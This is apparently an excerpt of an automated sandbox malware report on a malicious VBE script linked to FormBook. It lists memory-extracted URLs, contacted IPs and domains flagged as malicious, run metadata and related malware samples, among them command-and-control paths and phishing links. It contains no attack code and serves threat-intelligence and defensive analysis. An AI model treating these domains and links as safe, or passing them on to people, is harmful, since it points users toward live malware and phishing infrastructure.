                                                                http://www.614genetics.online/px.js?ch=1SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000535C000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000040FC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.google.comSearchProtocolHost.exe, 00000006.00000002.3777602378.0000000004D14000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.0000000003AB4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      high
                                                                      http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otfSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.guacamask.online/Guacamask_Online_Booking.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                http://i1.cdn-image.com/__media__/pics/28903/search.png)SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssSearchProtocolHost.exe, 00000006.00000002.3777602378.00000000049F0000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.0000000003790000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.Guacamask.onlineSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.guacamask.online/Guacamask_Online_Banking.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.guacamask.online/Guacamask_Online_Sa_Prevodom.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://www.guacamask.online/Guacamask_Online_Store.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuBSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://delivery.consentmanager.netSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.guacamask.online/__media__/design/underconstructionnotice.php?d=guacamask.onlineSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpgSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoSearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://kb.fastpanel.direct/troubleshoot/SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3777602378.00000000046CC000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.000000000346C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.guacamask.online/Guacamask_Online_Gratis.cfm?fp=BMg2bDqlEynnaEWfkT6gnVFAckdhMsvQK%2BVJBGuSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://www.ecosia.org/newtab/SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.614genetics.online/sk-logabpstatus.php?a=WnBLNjkrbVlldHVINmphNWlCc0VwNzM2dk40eEMzS2RMZnFBSearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000535C000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000040FC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://ac.ecosia.org/autocomplete?q=SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.hostgator.com.brSearchProtocolHost.exe, 00000006.00000002.3777602378.00000000051CA000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.0000000003F6A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.amayavp.xyzzfEzkYXCOLr.exe, 00000007.00000002.3778720033.0000000004ECD000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.seeseye.website/37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefBzfEzkYXCOLr.exe, 00000007.00000002.3776346635.0000000003922000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://www.aapanel.com/new/download.html?invite_code=aapaneleSearchProtocolHost.exe, 00000006.00000002.3777602378.0000000004216000.00000004.10000000.00040000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.0000000002FB6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfSearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SearchProtocolHost.exe, 00000006.00000003.1762818825.0000000007F58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://i1.cdn-image.com/__media__/js/min.js?v2.3SearchProtocolHost.exe, 00000006.00000002.3777602378.000000000453A000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.3779741897.0000000006510000.00000004.00000800.00020000.00000000.sdmp, zfEzkYXCOLr.exe, 00000007.00000002.3776346635.00000000032DA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        • No. of IPs < 25%
                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                        • 75% < No. of IPs
                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                        13.248.169.48
                                                                                                                        www.aiactor.xyzUnited States
                                                                                                                        16509AMAZON-02UStrue
                                                                                                                        185.27.134.144
                                                                                                                        www.amayavp.xyzUnited Kingdom
                                                                                                                        34119WILDCARD-ASWildcardUKLimitedGBtrue
                                                                                                                        103.224.182.242
                                                                                                                        www.seeseye.websiteAustralia
                                                                                                                        133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                        199.59.243.227
                                                                                                                        www.bcg.servicesUnited States
                                                                                                                        395082BODIS-NJUStrue
                                                                                                                        208.91.197.27
                                                                                                                        www.guacamask.onlineVirgin Islands (BRITISH)
                                                                                                                        40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                        47.254.140.255
                                                                                                                        www.yvcp3.infoUnited States
                                                                                                                        45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                        172.67.159.24
                                                                                                                        www.rafconstrutora.onlineUnited States
                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                        43.163.1.110
                                                                                                                        1hong.pels5zqo.shopJapan4249LILLY-ASUStrue
                                                                                                                        203.161.43.228
                                                                                                                        www.connecty.liveMalaysia
                                                                                                                        45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                        156.251.17.224
                                                                                                                        www.duwixushx.xyzSeychelles
                                                                                                                        132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                                                                        38.47.232.194
                                                                                                                        76kdd.topUnited States
                                                                                                                        174COGENT-174UStrue
                                                                                                                        172.67.220.36
                                                                                                                        www.supernutra01.onlineUnited States
                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                        98.124.224.17
                                                                                                                        www.bookingservice.centerUnited States
                                                                                                                        21740ENOMAS1UStrue
                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                        Analysis ID:1559545
                                                                                                                        Start date and time:2024-11-20 16:52:30 +01:00
                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                        Overall analysis duration:0h 10m 5s
                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                        Report type:full
                                                                                                                        Cookbook file name:default.jbs
                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                        Number of analysed new started processes analysed:13
                                                                                                                        Number of new started drivers analysed:0
                                                                                                                        Number of existing processes analysed:0
                                                                                                                        Number of existing drivers analysed:0
                                                                                                                        Number of injected processes analysed:2
                                                                                                                        Technologies:
                                                                                                                        • HCA enabled
                                                                                                                        • EGA enabled
                                                                                                                        • AMSI enabled
                                                                                                                        Analysis Mode:default
                                                                                                                        Analysis stop reason:Timeout
                                                                                                                        Sample name:DOC_114542366.vbe
                                                                                                                        Detection:MAL
                                                                                                                        Classification:mal100.troj.spyw.expl.evad.winVBE@9/3@15/13
                                                                                                                        EGA Information:
                                                                                                                        • Successful, ratio: 75%
                                                                                                                        HCA Information:
                                                                                                                        • Successful, ratio: 94%
                                                                                                                        • Number of executed functions: 32
                                                                                                                        • Number of non-executed functions: 315
                                                                                                                        Cookbook Comments:
                                                                                                                        • Found application associated with file extension: .vbe
                                                                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                                                                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                        • Execution Graph export aborted for target zfEzkYXCOLr.exe, PID 3700 because it is empty
                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                        • VT rate limit hit for: DOC_114542366.vbe
                                                                                                                        TimeTypeDescription
                                                                                                                        10:54:29API Interceptor9866857x Sleep call for process: SearchProtocolHost.exe modified
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        13.248.169.48CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.remedies.pro/hrap/
                                                                                                                        SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.optimismbank.xyz/lnyv/
                                                                                                                        New Order - RCII900718_Contract Drafting.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.avalanchefi.xyz/ctta/
                                                                                                                        need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.egldfi.xyz/3e55/
                                                                                                                        Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.tals.xyz/010v/
                                                                                                                        Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.wajf.net/dkz5/
                                                                                                                        rG5EzfUhUp.exeGet hashmaliciousSakula RATBrowse
                                                                                                                        • www.polarroute.com/newimage.asp?imageid=zcddwc1730788541&type=0&resid=5322796
                                                                                                                        dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.extrem.tech/ikn1/
                                                                                                                        Hire P.O.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.sonoscan.org/ew98/
                                                                                                                        RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.hopeisa.live/v0jl/
                                                                                                                        185.27.134.144RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.amayavp.xyz/d9ku/
                                                                                                                        shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.hasthosting.xyz/04fb/
                                                                                                                        SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.hasthosting.xyz/04fb/
                                                                                                                        http://outlook-accede-aqui.iceiy.com/Get hashmaliciousUnknownBrowse
                                                                                                                        • outlook-accede-aqui.iceiy.com/jquery.min.js
                                                                                                                        103.224.182.242SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.madhf.tech/vpqb/
                                                                                                                        PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.klohk.tech/3m3e/
                                                                                                                        Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • www.madhf.tech/p31e/
                                                                                                                        http://perpetualsnob.comGet hashmaliciousUnknownBrowse
                                                                                                                        • perpetualsnob.com/?fp=a3db7cd464228025d120ca597c81b5f2
                                                                                                                        Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.klohk.tech/3m3e/
                                                                                                                        SALARY OF OCT 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.klohk.tech/3m3e/
                                                                                                                        Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.givingaway123.net/1juc/
                                                                                                                        BL.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.givingaway123.net/1juc/
                                                                                                                        BILL OF LADDING.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.givingaway123.net/1juc/
                                                                                                                        jpdy1E8K4A.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • www.nobartv6.website/pp43/
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        www.rafconstrutora.onlineneed quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        www.bcg.servicesCV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 199.59.243.227
                                                                                                                        need quotations.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 199.59.243.227
                                                                                                                        PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                                        • 199.59.243.227
                                                                                                                        www.amayavp.xyzRFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 185.27.134.144
                                                                                                                        www.aiactor.xyzSWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 13.248.169.48
                                                                                                                        www.bookingservice.centerFOTO#U011eRAFLAR.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 98.124.224.17
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        WILDCARD-ASWildcardUKLimitedGBRFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 185.27.134.144
                                                                                                                        shipping doc_20241111.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 185.27.134.144
                                                                                                                        SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 185.27.134.144
                                                                                                                        https://downloadourauthfile-list.thsite.top/?em=EU-Sales-Support@scanlab.deGet hashmaliciousUnknownBrowse
                                                                                                                        • 185.27.134.155
                                                                                                                        http://appealaccountreporte.rf.gd/?i=1Get hashmaliciousUnknownBrowse
                                                                                                                        • 185.27.134.215
                                                                                                                        kingdom.ps1Get hashmaliciousAtlantida StealerBrowse
                                                                                                                        • 31.22.4.235
                                                                                                                        VM2ICvV5qQ.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 185.27.134.114
                                                                                                                        http://growthsparkplus.thsite.top/?email=anna@cellnextelecom.comGet hashmaliciousUnknownBrowse
                                                                                                                        • 185.27.134.108
                                                                                                                        la.bot.arm-20241006-1050.elfGet hashmaliciousUnknownBrowse
                                                                                                                        • 82.163.179.172
                                                                                                                        https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 31.22.4.60
                                                                                                                        TRELLIAN-AS-APTrellianPtyLimitedAUSWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 103.224.182.242
                                                                                                                        PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                                                        • 103.224.182.242
                                                                                                                        Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 103.224.182.242
                                                                                                                        8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                        • 103.224.182.252
                                                                                                                        7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                        • 103.224.182.252
                                                                                                                        UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                        • 103.224.182.252
                                                                                                                        1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                        • 103.224.182.252
                                                                                                                        arxtPs1STE.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                        • 103.224.182.252
                                                                                                                        Z8eHwAvqAh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                        • 103.224.182.252
                                                                                                                        WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                        • 103.224.182.252
                                                                                                                        AMAZON-02USfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                        • 18.238.49.99
                                                                                                                        https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comGet hashmaliciousUnknownBrowse
                                                                                                                        • 75.2.57.54
                                                                                                                        Isabella County Emergency Management-protected.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 3.160.188.127
                                                                                                                        http://track.reviewmgr.com/ls/click?upn=u001.W5y-2Fhe84rCuLxXDO470nfoYHiuPSKQTlPsTmGKWhJo6CB1T1AJI0Ng6lXheytWQK64FQ9fZMmvPyn2m-2FBbpOFw-3D-3DeITO_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FBhxNJZyCBl9w6yXNV0YfiK0sNR0p6qpefM4iEmPWziaOewswA00aDq7wvcNNH80ndQj9CncuidPzyrDEdMs65iWKbNVV-2FmU9TbukNj-2FicE0QhgzstHHAHDXYlbxCKcO7EtAFWAJoKqX3q5xt9Oa7YesS8-2F5zc7Z5V9RTeamF-2F0-2BvvKvokHXQs-2BxoWQKaUBjPewgaGQ56NNPBqOihkhW7Dcmtt-2B3bcLIgKfQsKreEmCiVox-2BYFecw4jK-2F1OqmVaDqU-3DGet hashmaliciousUnknownBrowse
                                                                                                                        • 108.158.75.87
                                                                                                                        Isabella County Emergency Management-protected.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 3.160.188.127
